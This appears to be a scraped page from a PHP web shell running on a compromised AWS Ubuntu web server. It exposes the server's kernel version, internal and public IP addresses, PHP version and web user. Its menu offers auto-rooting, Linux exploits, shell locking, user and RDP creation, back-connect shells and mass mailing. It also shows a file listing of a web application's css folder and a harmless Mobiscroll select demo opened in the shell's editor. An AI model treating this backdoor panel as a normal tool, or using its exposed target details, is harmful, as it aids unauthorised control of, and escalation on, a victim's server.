Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.15.211.55
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
Open_Sans
[ DIR ]
drwxr-sr-x
css
[ DIR ]
drwxrwsr-x
js
[ DIR ]
drwxrwsr-x
Model.css
2.37
KB
-rwxr-xr-x
basic.css
11.84
KB
-rw-rw-r--
basic18.06.2021.css
10.32
KB
-rwxr-xr-x
calendar-win2k-1.css
6.25
KB
-rwxr-xr-x
calendar.css
259
B
-rwxr-xr-x
candidate-entry.php
47.92
KB
-rwxr-xr-x
candidate_list.js
29.88
KB
-rwxr-xr-x
collinfo_popup.css
6.26
KB
-rwxr-xr-x
default_sb.css
6.33
KB
-rwxr-xr-x
fg.menu.css
4.23
KB
-rwxr-xr-x
format.css
398
B
-rw-rw-r--
group_style.css
864
B
-rwxr-xr-x
html_module.css
327
B
-rwxr-xr-x
jqModal.css
1.37
KB
-rwxr-xr-x
jquery.alerts.css
1021
B
-rwxr-xr-x
loginpage.css
1.46
KB
-rwxr-xr-x
logo.jpg
73.17
KB
-rwxr-xr-x
main.css
6.23
KB
-rwxr-xr-x
milk.css
5.35
KB
-rwxr-xr-x
readme.txt
573
B
-rw-rw-r--
report_ra_invigilator_dairy.ph...
16.01
KB
-rwxr-xr-x
report_ra_invigilators_dairy.p...
15.39
KB
-rwxr-xr-x
report_ra_roomwise_register_no...
10.6
KB
-rwxr-xr-x
roomwise_register_nos_list.php
16.97
KB
-rwxr-xr-x
select_multiple-select.html
2.96
KB
-rw-rw-r--
style.css
212.61
KB
-rwxr-xr-x
tabs.css
757
B
-rwxr-xr-x
tarka-ie.css
2
B
-rwxr-xr-x
tarka-safari.css
6.99
KB
-rwxr-xr-x
tarka-safari1.css
7.29
KB
-rwxr-xr-x
tarka.css
6.88
KB
-rwxr-xr-x
tarka_FireFox.css
17.26
KB
-rwxr-xr-x
tarka_IE6.css
6.79
KB
-rwxr-xr-x
tarka_IE8.css
6.7
KB
-rwxr-xr-x
tarkapopup.css
5.71
KB
-rwxr-xr-x
template_css.css
1.65
KB
-rwxr-xr-x
thickbox.css
4.08
KB
-rwxr-xr-x
thickbox1.css
4.08
KB
-rwxr-xr-x
tree.css
831
B
-rwxr-xr-x
ui.datepicker.css
3.56
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : select_multiple-select.html
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <script> // Ignore this in your implementation window.isMbscDemo = true; </script> <title> Multiple select </title> <!-- Mobiscroll JS and CSS Includes --> <link rel="stylesheet" href="css/mobiscroll.javascript.min.css"> <script src="js/mobiscroll.javascript.min.js"></script> <style type="text/css"> body { margin: 0; padding: 0; } button { display: inline-block; margin: 5px 5px 0 0; padding: 10px 30px; outline: 0; border: 0; cursor: pointer; background: #5185a8; color: #fff; text-decoration: none; font-family: arial, verdana, sans-serif; font-size: 14px; font-weight: 100; } input { width: 100%; margin: 0 0 5px 0; padding: 10px; border: 1px solid #ccc; border-radius: 0; font-family: arial, verdana, sans-serif; font-size: 14px; box-sizing: border-box; -webkit-appearance: none; } .mbsc-page { padding: 1em; } </style> </head> <body> <div mbsc-page class="demo-multiple-select"> <div style="height:100%"> <label> Multi-select <input mbsc-input id="demo-multiple-select-input" placeholder="Please select..." data-dropdown="true" data-input-style="outline" data-label-style="stacked" data-tags="true" /> </label> <select id="demo-multiple-select" multiple> <option value="1">Books</option> <option value="2">Movies, Music & Games</option> <option value="3">Electronics & Computers</option> <option value="4">Home, Garden & Tools</option> <option value="5">Health & Beauty</option> <option value="6">Toys, Kids & Baby</option> <option value="7">Clothing & Jewelry</option> <option value="8">Sports & Outdoors</option> </select> </div> </div> <script> mobiscroll.setOptions({ locale: mobiscroll.localeEn, // Specify language like: locale: mobiscroll.localePl or omit setting to use default theme: 'ios', // Specify theme like: theme: 'ios' or omit setting to use default themeVariant: 'light' // More info about themeVariant: https://docs.mobiscroll.com/5-26-2/javascript/select#opt-themeVariant }); mobiscroll.select('#demo-multiple-select', { inputElement: document.getElementById('demo-multiple-select-input') // More info about inputElement: https://docs.mobiscroll.com/5-26-2/javascript/select#opt-inputElement }); </script> </body> </html>
Close